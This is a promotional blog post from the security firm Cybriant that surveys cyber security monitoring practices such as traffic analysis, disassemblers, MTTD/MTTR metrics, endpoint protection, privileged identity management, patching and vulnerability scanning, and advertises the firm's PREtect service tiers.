At Cybriant, we recommend outsourcing to a professional cyber security monitoring company like us. The Cybersecurity experts on our team are professionals who have attained specialized in-depth expertise and proven knowledge in the essential areas of proactive cyber threat detection and mitigation. Our cyber security experts act as an extension of your IT team, understand your infrastructure, and are ready to defend your network.

Find out more here. 

Network Traffic Analysis Framework

Due to the increase in internet-based services, the size of network traffic data has become so large and complex that it is very difficult to process with the traditional data processing tools. Cyber security monitoring is a major problem for organizations that have a large amount of network traffic. Fast and efficient cybersecurity intrusion detection is a very challenging problem due to big and complex nature of network traffic data. A realistic cybersecurity intrusion detection system should be able to process large size of network traffic data as fast as possible in order to detect the malicious traffic as early as possible.

Cybriant helps defend your network through our tiered PREtect services. Find out more at PREtect:


The Disassembler is a program that converts machine code into the low-level symbolic language that can be read by the human. The disassembler is a reverse engineering cybersecurity monitoring tool. Traditionally it was applicable only on hardware but now also used for software as well. Disassembler, reverse engineering can be used to identify the details of a breach that how the attacker entered the system, and what steps were taken to breach the system. There are different tools to work on the path of a disassembler, which is Apktool, IDA and Dex2jar etc. are major ones.

Mean Time to Detect (MTTD) and Mean Time to Respond

Any organization that is serious about their cyber security will have a thorough understanding of their current Mean Time to Detect and Mean Time to Respond metrics. MTTD and MTTR are vital cyber security monitoring tools.

  • Meantime to detect is the amount of time it takes your team to discover a potential security incident.
  • Meantime to respond is the time it takes to control, remediate and/or eradicate a threat once it has been discovered.

A team of experts should review security events on daily basis and you should concern to reduce mean time to detect risks. When you detect risk then you need to immediately resolve this matter and reduce mean time to respond also. The core metric for many security teams to measure their effectiveness is in Mean-Time-to-Detect and Mean-Time-To-Respond. Once your security team identifies or detects a threat and creates an alert, it then becomes a matter of how much time is spent on containing and remediating the threat.

Trained Employees

No matter the size of your organization, we can probably guess that your employees aren’t trained well enough on cybersecurity and IT security. Hackers are getting increasingly good at recreating emails and personalizing for your employees. How can you effectively train your employees? It should come from the top down. Make security a priority in your organization.

There are different online platforms which are offering basic courses for employees training. KnowBe4 allows your organization to “phish your users” so you will know who the most phish-prone employees are and which ones should receive the most training.

Check it out here: Cyber Security Training

AI to Prevent Malware from Executing

Many organizations think that their antivirus software is enough to keep them safe. Unfortunately, that’s not always the case. Antivirus isn’t enough to protect endpoints.

The underlying technology for Cybriant’s Managed EDR service is the only technology that stops over 99% of advanced threats and malware before they can execute to cause harm. It completely eliminates the need for legacy antivirus software, anti-exploit products, whitelisting solutions, and host-based intrusion detection and prevention systems.

Cybriant uses a “prevention-first” technology – we stop attacks before they cause harm, vs allowing attacks to happen, then clean up the mess.  By reducing the number of endpoint security products deployed on the endpoint, customers gain operational efficiencies by not having to manage signatures, policies, or deployments of additional protection.

This service is included in PREtect PREMIUM

Privileged identity management (PIM)

Privileged identity management is also a key cyber security monitoring tool. PIM is highly recommended by cybersecurity experts that by this specific passwords are save in specific software. When any hacker is trying to hack a company’s website or data then PIM deceive attackers by changing passwords immediately. Due to this confidential data protected from stealing by attackers. PIM is also cost-effective and you can save your money.

Patch Management

Patch area codes which are basically used to update the software of your company to get the latest versions which are more effective. Responsive Patch Management solution will scan your systems, check for missing and available patches against our comprehensive vulnerability database, download and deploy missing patches and service packs, and generate reports to effectively manage the patch management process of the enterprise. Patch management is simply the practice of updating software with new pieces of code which is more effective for cyber security monitoring.

This service is included in PREtect ADVANCED. Find out more at 

Inside Threat Detection

Insider threat detection is also the main problem to face today. In this matter, you should take care of your employees. You should detect threats from inside because some malicious users who access private information and want to steal this. There are some negligent users who not voluntarily expose data but due to their negligence data can be exposed to outers by which company loss protection and some private/confidential files.

Check your vulnerabilities

Performing only a single vulnerability scan each year or quarter puts organizations at risk of not uncovering new vulnerabilities. The time between each scan is all an attacker needs to compromise a network. With continuous scanning, our security experts automatically have visibility to assess where each asset is secure or exposed.

Vulnerabilities are related to dangers or risks which our networks face or in emergency condition affected by some malware. So, for this purpose, you should examine your network to find risks and their solutions. Confidently visualize, analyze, and measure your cyber risk vulnerabilities is a tool for reducing cyber risk. Identifying vulnerabilities and having a system in place to patch will be incredibly effective cyber security monitoring tools.


With 3 Levels of Protection, PREtect covers all your Cyber Security Monitoring Tools